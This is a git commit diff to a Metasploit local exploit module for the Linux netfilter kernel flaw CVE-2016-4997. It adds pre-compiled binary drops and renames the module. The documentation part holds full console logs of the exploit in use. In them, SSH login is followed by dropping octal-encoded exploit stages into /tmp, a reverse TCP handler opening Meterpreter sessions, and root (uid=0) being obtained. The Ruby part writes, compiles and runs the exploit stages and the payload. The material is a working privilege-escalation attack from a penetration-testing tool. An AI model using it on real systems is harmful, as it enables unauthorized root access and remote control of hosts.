binary drops work!

bug/bundler_fix
h00die 2016-09-24 21:31:00 -04:00
parent 3dff41c833
commit 23e5556a4c
4 changed files with 157 additions and 63 deletions

Binary file not shown.

Binary file not shown.

View File

@ -9,15 +9,14 @@ This module (and the original exploit) are written in two parts: desc, and pwn.
There are a few requirements for this module to work (ubuntu):
1. ip_tables.ko has to be loaded (root running iptables -L will do such)
2. libc6-dev-i386 needs to be installed to compile
3. shem and sham can not be installed/running
2. shem and sham can not be installed/running
This module has been tested against:
1. Ubuntu 16.04.1 (sudo apt-get install linux-image-4.4.0-21-generic)
2. Ubuntu 16.04 (default kernel) linux-image-4.4.0-21-generic
This does not work against the following vulnerable systems. Additional work may be required.
This does not work against the following vulnerable systems. Additional work may be required to the binary and C code to enable these targets.
1. Fedora 24 < [kernel-4.6.3-300](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c18)
2. Fedora 22 < [kernel-4.4.14-200](https://bugzilla.redhat.com/show_bug.cgi?id=1349722#c19)
@ -28,7 +27,7 @@ This does not work against the following vulnerable systems. Additional work ma
1. Start msfconsole
2. Exploit a box via whatever method
4. Do: `use exploit/linux/local/ubuntu_netfilter`
4. Do: `use exploit/linux/local/netfilter_priv_esc`
5. Do: `set session #`
6. Do: `set verbose true`
7. Do: `exploit`
@ -51,7 +50,7 @@ This does not work against the following vulnerable systems. Additional work ma
### Ubuntu 16.04.1 (with linux-image-4.4.0-21-generic)
Initial Access
#### Initial Access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 127.0.0.1
@ -69,68 +68,151 @@ Initial Access
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Escalate
#### Escalate
msf auxiliary(ssh_login) > use exploit/linux/local/ubuntu_netfilter
msf exploit(ubuntu_netfilter) > set session 1
session => 1
msf exploit(ubuntu_netfilter) > set verbose true
verbose => true
msf exploit(ubuntu_netfilter) > exploit
[*] Started reverse TCP handler on 172.20.14.188:4444
[*] Checking if libc6-dev-i386 is installed
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
[+] libc6-dev-i386 is installed
[*] Checking if ip_tables.ko is loaded
[+] gcc-multilib is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Checking if ip_tables is loaded in kernel
[+] ip_tables.ko is loaded
[*] Checking if shem or sham are installed
[+] shem and sham not present.
[*] Writing desc executable to /tmp/452xNomE.c
[*] Writing desc executable to /tmp/fI1xW1Js.c
[*] Max line length is 65537
[*] Writing 3484 bytes in 1 chunks of 12068 bytes (octal-encoded), using printf
[*] Executing /tmp/452xNomE, may take around 35s to finish. Watching for /tmp/rrOA1xsB to be created.
[*] Writing 3291 bytes in 1 chunks of 11490 bytes (octal-encoded), using printf
[*] Executing /tmp/fI1xW1Js, may take around 35s to finish. Watching for /tmp/GWqpwKnG to be created.
[*] Waited 0s so far
[*] Waited 10s so far
[*] Waited 20s so far
[*] Waited 30s so far
[+] desc finished, env ready.
[*] Writing payload to /tmp/HbFVMTZM
[*] Writing payload to /tmp/Thzyfenv
[*] Max line length is 65537
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
[*] Writing pwn executable to /tmp/eRFqvuyG.c
[*] Writing pwn executable to /tmp/wmfFiQKu.c
[*] Max line length is 65537
[*] Writing 1418 bytes in 1 chunks of 4975 bytes (octal-encoded), using printf
[*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 172.20.14.188
[*] Meterpreter session 2 opened (172.20.14.188:4444 -> 172.20.14.188:45114) at 2016-09-16 01:16:52 -0400
[*] Sending stage (1495599 bytes) to 192.168.2.137
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60982) at 2016-09-24 17:22:47 -0400
[+] Deleted /tmp/fI1xW1Js.c
[+] Deleted /tmp/GWqpwKnG
[+] Deleted /tmp/fI1xW1Js
[+] Deleted /tmp/Thzyfenv
[+] Deleted /tmp/wmfFiQKu.c
[+] Deleted /tmp/wmfFiQKu
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
### Re-exploit
#### Escalate w/ pre-compiled binaries
In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again.
msf exploit(ubuntu_netfilter) > set reexploit true
reexploit => true
msf exploit(ubuntu_netfilter) > set session 2
session => 2
msf exploit(ubuntu_netfilter) > exploit
msf exploit(netfilter_priv_esc) > exploit
[*] Started reverse TCP handler on 172.20.14.188:4445
[*] Checking if libc6-dev-i386 is installed
[+] libc6-dev-i386 is installed
[*] Checking if ip_tables.ko is loaded
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
[-] libc6-dev-i386 is not installed. Compiling will fail.
[-] gcc-multilib is not installed. Compiling will fail.
[-] gcc is not installed. Compiling will fail.
[*] Dropping pre-compiled exploit on system
[*] Checking if ip_tables is loaded in kernel
[+] ip_tables.ko is loaded
[*] Checking if shem or sham are installed
[+] shem and sham not present.
[*] Writing payload to /tmp/OblBUbtc
[*] Writing pwn executable to /tmp/u4PnMEdw.c
[*] Max line length is 65537
[*] Writing 7820 bytes in 1 chunks of 21701 bytes (octal-encoded), using printf
[*] Executing /tmp/8lQZGJdL, may take around 35s to finish. Watching for /tmp/okDjTFSS to be created.
[*] Waited 0s so far
[*] Waited 10s so far
[*] Waited 20s so far
[*] Waited 30s so far
[+] desc finished, env ready.
[*] Writing payload to /tmp/2016_4997_payload
[*] Max line length is 65537
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
[*] Writing pwn executable to /tmp/nOO6sYqi
[*] Max line length is 65537
[*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 172.20.14.188
[*] Meterpreter session 3 opened (172.20.14.188:4445 -> 172.20.14.188:40370) at 2016-09-17 13:35:57 -0400
[+] Deleted /tmp/OblBUbtc
[+] Deleted /tmp/u4PnMEdw.c
[+] Deleted /tmp/u4PnMEdw
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.
[*] Sending stage (1495599 bytes) to 192.168.2.137
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:46778) at 2016-09-24 21:24:22 -0400
[+] Deleted /tmp/okDjTFSS
[+] Deleted /tmp/2016_4997_payload
[+] Deleted /tmp/nOO6sYqi
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
#### Re-exploit
In this scenario, we already exploit the box, for whatever reason our shell died. So now we want to re-exploit, but we dont need to run desc again.
msf exploit(netfilter_priv_esc) > set reexploit true
reexploit => true
msf exploit(netfilter_priv_esc) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
[+] libc6-dev-i386 is installed
[+] gcc-multilib is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Checking if ip_tables is loaded in kernel
[+] ip_tables.ko is loaded
[*] Checking if shem or sham are installed
[+] shem and sham not present.
[*] Writing payload to /tmp/egMfQrrI
[*] Max line length is 65537
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
[*] Writing pwn executable to /tmp/Yf8CAdMu.c
[*] Max line length is 65537
[*] Writing 1326 bytes in 1 chunks of 4699 bytes (octal-encoded), using printf
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.2.137
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60984) at 2016-09-24 17:29:06 -0400
[+] Deleted /tmp/egMfQrrI
[+] Deleted /tmp/Yf8CAdMu.c
[+] Deleted /tmp/Yf8CAdMu
meterpreter >
#### Re-exploit w/ pre-compiled binaries
msf exploit(netfilter_priv_esc) > set reexploit true
reexploit => true
msf exploit(netfilter_priv_esc) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Checking if 32bit C libraries, gcc-multilib, and gcc are installed
[+] libc6-dev-i386 is installed
[-] gcc-multilib is not installed. Compiling will fail.
[-] gcc is not installed. Compiling will fail.
[*] Dropping pre-compiled exploit on system
[*] Checking if ip_tables is loaded in kernel
[+] ip_tables.ko is loaded
[*] Checking if shem or sham are installed
[+] shem and sham not present.
[*] Writing payload to /tmp/2016_4997_payload
[*] Max line length is 65537
[*] Writing 155 bytes in 1 chunks of 455 bytes (octal-encoded), using printf
[*] Writing pwn executable to /tmp/SZrv2NOR
[*] Max line length is 65537
[*] Writing 8456 bytes in 1 chunks of 22023 bytes (octal-encoded), using printf
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.2.137
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.137:60996) at 2016-09-24 20:47:03 -0400
meterpreter >

View File

@ -344,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Local
pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/,
"execl(\"#{payload_path}\", NULL);")
def pwn(payload_path, pwn_file, pwn)
def pwn(payload_path, pwn_file, pwn, compile)
# lets write our payload since everythings set for priv esc
vprint_status("Writing payload to #{payload_path}")
write_file(payload_path, generate_payload_exe)
@ -352,43 +352,55 @@ class MetasploitModule < Msf::Exploit::Local
register_file_for_cleanup(payload_path)
# now lets drop part 2, and finish up.
print_status "Writing pwn executable to #{pwn_file}.c"
rm_f pwn_file
rm_f "#{pwn_file}.c"
write_file("#{pwn_file}.c", pwn)
cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}")
register_file_for_cleanup("#{pwn_file}.c")
if compile
print_status "Writing pwn executable to #{pwn_file}.c"
rm_f "#{pwn_file}.c"
write_file("#{pwn_file}.c", pwn)
cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}")
register_file_for_cleanup("#{pwn_file}.c")
else
print_status "Writing pwn executable to #{pwn_file}"
write_file(pwn_file, pwn)
end
register_file_for_cleanup(pwn_file)
cmd_exec("chmod +x #{pwn_file}; #{pwn_file}")
end
if not compile # we need to override with our pre-created binary
# pwn file
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-2')
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out')
fd = ::File.open( path, "rb")
pwn = fd.read(fd.stat.size)
fd.close
# desc file
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-1')
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out')
fd = ::File.open( path, "rb")
decr = fd.read(fd.stat.size)
fd.close
# overwrite the hardcoded variable names in the compiled versions
env_ready_file = '/tmp/okDjTFSS'
payload_path = '/tmp/2016_4997_payload'
end
# check for shortcut
if datastore['REEXPLOIT']
pwn(payload_path, pwn_file, pwn)
pwn(payload_path, pwn_file, pwn, compile)
else
print_status "Writing desc executable to #{desc_file}.c"
rm_f env_ready_file
rm_f "#{desc_file}.c"
rm_f desc_file
write_file("#{desc_file}.c", decr)
output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}")
if compile
print_status "Writing desc executable to #{desc_file}.c"
rm_f "#{desc_file}.c"
write_file("#{desc_file}.c", decr)
register_file_for_cleanup("#{desc_file}.c")
output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}")
else
write_file(desc_file, decr)
end
rm_f env_ready_file
register_file_for_cleanup(env_ready_file)
register_file_for_cleanup("#{desc_file}.c")
register_file_for_cleanup(desc_file)
#register_file_for_cleanup(desc_file)
if not file_exist?(desc_file)
vprint_error("gcc failure output: #{output}")
fail_with(Failure::Unknown, "#{desc_file}.c failed to compile")
@ -409,7 +421,7 @@ class MetasploitModule < Msf::Exploit::Local
if file_exist?(env_ready_file)
print_good("desc finished, env ready.")
pwn(payload_path, pwn_file, pwn)
pwn(payload_path, pwn_file, pwn, compile)
return
end
sec_waited +=1